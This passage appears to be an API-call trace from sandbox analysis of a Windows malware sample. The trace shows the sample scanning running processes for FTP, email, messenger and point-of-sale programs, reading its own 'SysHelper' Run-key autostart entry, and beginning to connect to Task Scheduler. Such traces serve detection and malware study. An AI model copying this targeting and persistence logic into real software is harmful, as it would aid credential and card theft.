lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.623] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xdf0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0108.623] CloseHandle (hObject=0x5a0) returned 1 [0108.623] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x5a0 [0108.623] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.624] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1b0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0108.624] CloseHandle (hObject=0x5a0) returned 1 [0108.624] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x5a0 [0108.624] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.625] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x3c0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0108.626] CloseHandle (hObject=0x5a0) returned 1 [0108.626] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f4) returned 0x5a0 [0108.626] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.627] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x20000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0108.627] CloseHandle (hObject=0x5a0) returned 1 [0108.627] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x5a0 [0108.627] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.628] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x12b0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0108.628] CloseHandle (hObject=0x5a0) returned 1 [0108.629] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x914) returned 0x5a0 [0108.629] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.630] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1120000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0108.630] CloseHandle (hObject=0x5a0) returned 1 [0108.630] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x5a0 [0108.630] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.631] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xdb0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0108.632] CloseHandle (hObject=0x5a0) returned 1 [0108.632] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x5a0 [0108.632] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.633] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xab0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0108.633] CloseHandle (hObject=0x5a0) returned 1 [0108.633] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x5a0 [0108.633] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.634] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xc90000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0108.634] CloseHandle (hObject=0x5a0) returned 1 [0108.634] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x5a0 [0108.634] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.636] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x9e0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0108.636] CloseHandle (hObject=0x5a0) returned 1 [0108.636] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x5a0 [0108.636] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.637] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x920000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0108.638] CloseHandle (hObject=0x5a0) returned 1 [0108.638] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x5a0 [0108.638] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.639] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x11c0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0108.639] CloseHandle (hObject=0x5a0) returned 1 [0108.639] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x984) returned 0x5a0 [0108.639] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.641] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xae0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0108.641] CloseHandle (hObject=0x5a0) returned 1 [0108.641] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x994) returned 0x5a0 [0108.641] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.642] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xb70000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0108.643] CloseHandle (hObject=0x5a0) returned 1 [0108.643] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a4) returned 0x5a0 [0108.643] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.644] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xb50000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0108.644] CloseHandle (hObject=0x5a0) returned 1 [0108.644] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b4) returned 0x5a0 [0108.644] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.645] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xef0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0108.645] CloseHandle (hObject=0x5a0) returned 1 [0108.645] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x5a0 [0108.646] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.647] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xbb0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0108.647] CloseHandle (hObject=0x5a0) returned 1 [0108.647] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d4) returned 0x5a0 [0108.647] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.649] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1320000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0108.649] CloseHandle (hObject=0x5a0) returned 1 [0108.649] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e4) returned 0x5a0 [0108.649] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.650] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xe10000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0108.651] CloseHandle (hObject=0x5a0) returned 1 [0108.651] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x5a0 [0108.651] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.652] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x150000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0108.652] CloseHandle (hObject=0x5a0) returned 1 [0108.652] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa04) returned 0x5a0 [0108.653] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.654] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x8b0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0108.654] CloseHandle (hObject=0x5a0) returned 1 [0108.654] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa14) returned 0x5a0 [0108.654] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.656] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1030000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0108.656] CloseHandle (hObject=0x5a0) returned 1 [0108.656] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa24) returned 0x5a0 [0108.656] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.657] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1200000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0108.658] CloseHandle (hObject=0x5a0) returned 1 [0108.658] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa34) returned 0x5a0 [0108.658] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.659] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1130000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0108.659] CloseHandle (hObject=0x5a0) returned 1 [0108.659] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa44) returned 0x5a0 [0108.660] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.661] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x890000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0108.661] CloseHandle (hObject=0x5a0) returned 1 [0108.661] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa54) returned 0x5a0 [0108.661] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.662] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x80000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0108.663] CloseHandle (hObject=0x5a0) returned 1 [0108.663] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa64) returned 0x5a0 [0108.663] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.664] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x2c0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0108.664] CloseHandle (hObject=0x5a0) returned 1 [0108.664] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa74) returned 0x5a0 [0108.664] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.665] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x880000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0108.666] CloseHandle (hObject=0x5a0) returned 1 [0108.666] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa84) returned 0x5a0 [0108.666] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.667] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xa40000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0108.667] CloseHandle (hObject=0x5a0) returned 1 [0108.667] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa94) returned 0x5a0 [0108.667] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.668] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xe50000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0108.668] CloseHandle (hObject=0x5a0) returned 1 [0108.668] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaa4) returned 0x5a0 [0108.668] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.669] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xad0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0108.670] CloseHandle (hObject=0x5a0) returned 1 [0108.670] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab4) returned 0x5a0 [0108.670] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.671] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x2f0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0108.671] CloseHandle (hObject=0x5a0) returned 1 [0108.671] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xac4) returned 0x5a0 [0108.671] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.672] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xd0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0108.672] CloseHandle (hObject=0x5a0) returned 1 [0108.672] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad4) returned 0x5a0 [0108.672] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.673] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x260000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0108.674] CloseHandle (hObject=0x5a0) returned 1 [0108.674] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xae4) returned 0x5a0 [0108.674] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.675] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x820000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0108.675] CloseHandle (hObject=0x5a0) returned 1 [0108.675] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaf4) returned 0x5a0 [0108.675] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.676] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1140000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0108.676] CloseHandle (hObject=0x5a0) returned 1 [0108.676] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb04) returned 0x5a0 [0108.676] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.677] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x340000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0108.678] CloseHandle (hObject=0x5a0) returned 1 [0108.678] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb14) returned 0x5a0 [0108.678] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.679] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xf50000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0108.679] CloseHandle (hObject=0x5a0) returned 1 [0108.679] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb24) returned 0x5a0 [0108.679] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.680] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1070000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0108.680] CloseHandle (hObject=0x5a0) returned 1 [0108.681] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb34) returned 0x5a0 [0108.681] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.682] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1320000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0108.682] CloseHandle (hObject=0x5a0) returned 1 [0108.682] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb44) returned 0x5a0 [0108.682] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.683] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xe80000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0108.683] CloseHandle (hObject=0x5a0) returned 1 [0108.683] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb54) returned 0x5a0 [0108.683] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.684] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x12a0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="taste.exe") returned 0x9 [0108.684] CloseHandle (hObject=0x5a0) returned 1 [0108.685] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb64) returned 0x5a0 [0108.685] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.686] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x890000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="anniversary hat.exe") returned 0x13 [0108.686] CloseHandle (hObject=0x5a0) returned 1 [0108.686] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb74) returned 0x5a0 [0108.686] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.687] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1010000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="judy devices.exe") returned 0x10 [0108.687] CloseHandle (hObject=0x5a0) returned 1 [0108.687] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb84) returned 0x5a0 [0108.687] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.688] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x860000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="act.exe") returned 0x7 [0108.688] CloseHandle (hObject=0x5a0) returned 1 [0108.689] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb94) returned 0x5a0 [0108.689] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.690] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1160000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="fx-woman.exe") returned 0xc [0108.690] CloseHandle (hObject=0x5a0) returned 1 [0108.690] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc0) returned 0x0 [0108.690] CloseHandle (hObject=0x0) returned 0 [0108.690] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe4) returned 0x0 [0108.690] CloseHandle (hObject=0x0) returned 0 [0108.690] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x874) returned 0x5a0 [0108.690] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.691] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x400000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="YTHGRFED.EXE.exe") returned 0x10 [0108.691] CloseHandle (hObject=0x5a0) returned 1 [0108.698] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x639d98 [0108.698] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x660348 [0108.698] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3210350 [0108.698] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x321e028 [0108.698] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x662780 [0108.698] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x6629e8 [0108.698] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x32305c0 [0108.698] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3230828 [0108.698] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3230a90 [0108.698] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3230cf8 [0108.698] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3230f60 [0108.704] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18df60 | out: phkResult=0x18df60*=0x5a0) returned 0x0 [0108.704] RegQueryValueExW (in: hKey=0x5a0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18df5c, lpData=0x18c688, lpcbData=0x18df40*=0x400 | out: lpType=0x18df5c*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart", lpcbData=0x18df40*=0xe0) returned 0x0 [0108.704] RegCloseKey (hKey=0x5a0) returned 0x0 [0108.704] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xe0) returned 0x65fd78 [0108.704] lstrlenA (lpString="\" --AutoStart") returned 13 [0108.704] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xd0) returned 0x31e22f0 [0108.704] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65fd78 | out: hHeap=0x610000) returned 1 [0108.704] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe") returned 1 [0108.705] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xd0) returned 0x31e23c8 [0108.705] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x31e22f0 | out: hHeap=0x610000) returned 1 [0108.705] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xd0) returned 0x31e22f0 [0108.705] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xd0) returned 0x31e24a0 [0108.711] CoInitialize (pvReserved=0x0) returned 0x0 [0108.724] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0108.724] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xd0) returned 0x31e2728 [0108.724] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18df4c | out: ppv=0x18df4c*=0x2900888) returned 0x0 [0108.733] TaskScheduler:ITaskService:Connect (This=0x2900888, serverName=0x18d9d8*(varType=0x0, wReserved1=0x7734, wReserved2=0xe0d2, wReserved3=0x7734, varVal1=0x67, varVal2=0xd0), user=0x18d9e8*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xd8), domain=0x18d9f8*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, 